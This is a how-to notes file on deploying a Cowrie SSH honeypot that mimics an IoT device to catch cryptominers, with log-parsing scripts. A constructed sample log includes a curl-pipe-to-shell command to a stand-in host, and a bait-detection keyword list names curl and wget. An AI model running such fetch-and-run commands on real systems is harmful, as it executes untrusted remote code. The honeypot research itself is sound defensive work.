58e5f19 added useful one liners I used a lot
~alienagain pushed to ~alienagain/honeypot_notes git
Following this manual I configured a cowrie environment in a VPS:
1.1 Changing the real SSH port from 22 to a port between 49152 and 65535
sudo nvim /etc/ssh/sshd_config
1.2 Restart service
sudo systemctl restart ssh
sudo systemctl status ssh
1.3 Install software
sudo apt install -y python-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind git
1.4 Create passwordless user cowrie
sudo adduser --disabled-password cowrie
1.5 Installing authbind, running the command and changing ownership
sudo apt install authbind
sudo touch /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22
1.6 Changing permissions
sudo chmod 770 /etc/authbind/byport/22
1.7 Log in as cowrie and go "home"
sudo su cowrie
cd ~
1.8 Cloning the cowrie repo and entering it
git clone https://github.com/micheloosterhof/cowrie
cd cowrie
1.9 Create new configuration
cp etc/cowrie.cfg.dist etc/cowrie.cfg
1.10 Edit the file, replacing 2222 with 22 in listen_endpoints
nvim etc/cowrie.cfg
in the file:
listen_endpoints = tcp:2222:interface=0.0.0.0
to
listen_endpoints = tcp:22:interface=0.0.0.0
1.11 Create the virtual environment and enable it
virtualenv --python=python3 cowrie-env
source cowrie-env/bin/activate
1.12 Updating pip
pip install --upgrade pip
1.13 Install requirements
pip3 install -r requirements.txt
1.14 Starting cowrie
bin/cowrie start
1.15 Checking the honeypot
netstat -tan
2.1 Copying a docker image
In my case I wanted to imitate an IoT Linux device to investigate SSH brute force activity related to cryptomining, so I'm copying a docker system based on openwrt. First I logged out of the cowrie user and, as the default sudo user, ran:
$ sudo mkdir -p /tmp/picklefs
$ sudo docker create --name dummy openwrtorg/rootfs:x86-64
$ for i in proc usr sbin sys lib etc bin; do sudo docker cp dummy:$i /tmp/picklefs; done
Now I have a copy of the whole openwrt filesystem. I want to create this filesystem in cowrie, so:
$ /home/cowrie/cowrie/bin/createfs -l /tmp/picklefs -d 6 -o /home/cowrie/cowrie/share/cowrie/honeyfs.pickle
The default pickle filesystem is fs.pickle; I made a backup of it and renamed the new one to take its place:
$ cd /home/cowrie/cowrie/share/cowrie/
$ cp fs.pickle fs.pickle.bak
$ mv honeyfs.pickle fs.pickle
I also needed to copy the filesystem into the honeyfs directory (/home/cowrie/cowrie/honeyfs), so I used the /tmp/ copy for that:
$ cd /home/cowrie/cowrie/honeyfs
$ rm -rf *
$ cp -a /tmp/picklefs/. .
The filesystem is copied, but I wanted to add some things. In the case of cryptominers, most of them attempt a few things:
So I wanted to put some things around to make it "easier" for a cryptominer to feel at home.
2.2 LD PRELOAD
First, creating an empty ld.so.preload file. I used a nice tool of cowrie to interact with the fake filesystem. In the cowrie repo home directory:
$ sudo su cowrie
$ source cowrie-env/bin/activate
(cowrie-env) cowrie@<myvps>:~/cowrie$ ./bin/fsctl share/cowrie/fs.pickle
A shell should open, and then I went like:
Kippo/Cowrie file system interactive editor
Donovan Hubbard, Douglas Hubbard, March 2013
Type 'help' for help
fs.pickle:/$ cd /etc/
fs.pickle:/etc$ touch ld.so.preload
2.3 Generating ssh content
As the cowrie user, without the virtualenv activated, in /home/cowrie/cowrie/honeyfs:
$ mkdir .ssh
$ mkdir .ssh/config
$ cd .ssh/config
$ ssh-keygen
In the directory and file prompt, I chose the current folder. Later I tried to ssh to a beacon address using the same key and saved the known_hosts file in the same folder, too. I then went to the fsctl shell and added the same files there.
2.4 Deleting competition and configuring wget and curl
In share/cowrie/txtcmds/bin (under the cowrie repo directory) I created the files curl and wget with fake error messages:
$ touch curl wget
$ nvim curl
...
$ nvim wget
...
Since I was already doing this, I added ufw too. In the enable file I added fake services with names commonly seen in other cryptominers, so it is visible if any enumeration is attempted.
When everything was done, I tested it. First, activating the virtualenv and then in the cowrie repo directory:
$ bin/cowrie stop
$ bin/cowrie start
And attempted to connect using another console:
$ ssh -p 22 root@<myip>
I played around a bit in the fake shell and exited. Then I took a look at cowrie/var/log/cowrie. After a day I saw in the logs how some IPs attempted to connect, so I created a script to extract those IPs directly:
#!/bin/bash
# Collect the source IPs that opened a session yesterday, from cowrie's JSON log.
# Run inside cowrie/var/log/cowrie, where the daily cowrie.json.YYYY-MM-DD files live.
yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
grep "New connection:" "cowrie.json.$yesterday" > connections
while read -r line; do
    # The message looks like: New connection: 1.2.3.4:54321 (10.0.0.5:22) [session: abc123]
    step1=${line##*connection:}   # drop everything up to and including "connection:"
    step2=${step1%%(*}            # drop the "(local endpoint) [session ...]" tail
    step2=${step2# }              # trim the leading space
    step2=${step2%%:*}            # drop the source port so the same IP is deduplicated below
    echo "$step2" >> collectedIPs_raw
done < connections
awk '!a[$0]++' collectedIPs_raw > collectedIPs   # deduplicate, keeping first-seen order
rm collectedIPs_raw connections
I then investigated the IPs in collectedIPs, ignoring my own. I also wanted to investigate the commands typed, so I did:
#!/bin/bash
# Collect yesterday's command-input events (cowrie.command.input) from the JSON log.
yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
grep "input" "cowrie.json.$yesterday" > commands
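The two scripts above pull the source IPs and the commands out of cowrie.json with grep and bash string slicing. cowrie.json is one JSON object per line, so the same information can be read from the fields directly (src_ip on cowrie.session.connect events, input on cowrie.command.input events), which also tolerates lines that are not "New connection:" messages and lets you skip your own address. The following is an added example, not part of the original notes or of the cowrie project; the log lines are constructed samples using documentation IP ranges, and MY_IP stands in for the <myip> placeholder used above. It also flags the sessions that touched the bait planted earlier (ld.so.preload, curl/wget, ufw), which is the signal this honeypot was built to catch.

```python
import json
from collections import OrderedDict, defaultdict

# Constructed sample of cowrie.json lines (not real captures). The field names
# (eventid, src_ip, session, input, ...) are the ones cowrie's JSON output uses;
# the addresses are documentation ranges. One malformed line is included on purpose.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7", "src_port": 51234, "dst_ip": "10.0.0.5", "dst_port": 22, "session": "a1b2c3d4e5f6", "message": "New connection: 198.51.100.7:51234 (10.0.0.5:22) [session: a1b2c3d4e5f6]", "timestamp": "2023-01-01T03:12:44.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "123456", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "message": "login attempt [root/123456] succeeded", "timestamp": "2023-01-01T03:12:45.000000Z"}
{"eventid": "cowrie.command.input", "input": "cat /etc/ld.so.preload", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "message": "CMD: cat /etc/ld.so.preload", "timestamp": "2023-01-01T03:12:50.000000Z"}
{"eventid": "cowrie.command.input", "input": "curl -s http://203.0.113.9/x.sh | sh", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "message": "CMD: curl -s http://203.0.113.9/x.sh | sh", "timestamp": "2023-01-01T03:12:55.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7", "src_port": 51300, "dst_ip": "10.0.0.5", "dst_port": 22, "session": "0f0f0f0f0f0f", "message": "New connection: 198.51.100.7:51300 (10.0.0.5:22) [session: 0f0f0f0f0f0f]", "timestamp": "2023-01-01T04:00:00.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.42", "src_port": 40000, "dst_ip": "10.0.0.5", "dst_port": 22, "session": "badc0ffee000", "message": "New connection: 203.0.113.42:40000 (10.0.0.5:22) [session: badc0ffee000]", "timestamp": "2023-01-01T05:00:00.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "192.0.2.1", "src_port": 1234, "dst_ip": "10.0.0.5", "dst_port": 22, "session": "ffffffffffff", "message": "New connection: 192.0.2.1:1234 (10.0.0.5:22) [session: ffffffffffff]", "timestamp": "2023-01-01T06:00:00.000000Z"}
not a json line
"""

# Assumed own address (the notes use <myip>); sessions from it are the author's own tests.
MY_IP = "192.0.2.1"

# Commands touching the bait planted in the honeyfs: ld.so.preload, curl/wget, ufw.
BAIT_MARKERS = ("ld.so.preload", "curl", "wget", "ufw")


def parse_events(text):
    """Parse cowrie.json content line by line, skipping lines that are not JSON."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line, e.g. a partially written record
    return events


def collect_ips(events, ignore=()):
    """Unique source IPs of new sessions, in first-seen order (what the bash
    script aims at), read from src_ip instead of slicing the message text."""
    seen = OrderedDict()
    for ev in events:
        if ev.get("eventid") == "cowrie.session.connect":
            ip = ev.get("src_ip")
            if ip and ip not in ignore:
                seen.setdefault(ip, None)
    return list(seen)


def commands_by_session(events):
    """Map session id -> list of commands typed, from cowrie.command.input events."""
    cmds = defaultdict(list)
    for ev in events:
        if ev.get("eventid") == "cowrie.command.input" and "input" in ev:
            cmds[ev["session"]].append(ev["input"])
    return dict(cmds)


def sessions_touching_bait(events, markers=BAIT_MARKERS):
    """Sessions whose commands mention any planted bait, with the markers they hit."""
    hits = {}
    for session, cmds in commands_by_session(events).items():
        matched = sorted({m for c in cmds for m in markers if m in c})
        if matched:
            hits[session] = matched
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("IPs:", collect_ips(evs, ignore={MY_IP}))
    for sess, cmds in commands_by_session(evs).items():
        print(sess, cmds)
    print("bait hits:", sessions_touching_bait(evs))
```

To run it against a real day of logs, replace SAMPLE_LOG with the contents of cowrie.json.YYYY-MM-DD; the per-line parsing means a single corrupt record does not abort the whole run.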
On my local computer I fetched those files with:
#!/bin/bash
# Fetch the collected IP list or the command list from the honeypot VPS.
# <my_real_port>, <myuser> and <myip> are placeholders for the real SSH port,
# user and address of the VPS (not the honeypot port).
LOGDIR=/home/cowrie/cowrie/var/log/cowrie
if [ "$1" = "IPS" ]; then
    echo "collecting IPs"
    scp -P <my_real_port> <myuser>@<myip>:$LOGDIR/collectedIPs .
elif [ "$1" = "commands" ]; then
    echo "collecting commands"
    scp -P <my_real_port> <myuser>@<myip>:$LOGDIR/commands .
else
    echo "ERROR: usage: $0 IPS|commands" >&2
    exit 1
fi
So all I had to do was:
$ myscript IPS
or:
$ myscript commands
As I said, most cryptominers try to delete their competitors. I created a realistic kinsing sample which downloads a "cryptomining binary" from a webserver I'm also serving myself. The rest of the sample looks exactly like a real kinsing miner downloader.
The binary is an ELF compiled from bash which has some real but safe miner string lines that trigger YARA alerts for Linux miners, but which also attempts to ssh into the honeypot shell in a one-liner. I uploaded both on VT, the fake downloader and the fake binary :)
So far, a few IPs attempted to connect; most of them are DigitalOcean IPs that are related to malware and SSH brute forcers. A couple of them attempted a TLS handshake, i.e. tried to connect using the HTTPS protocol.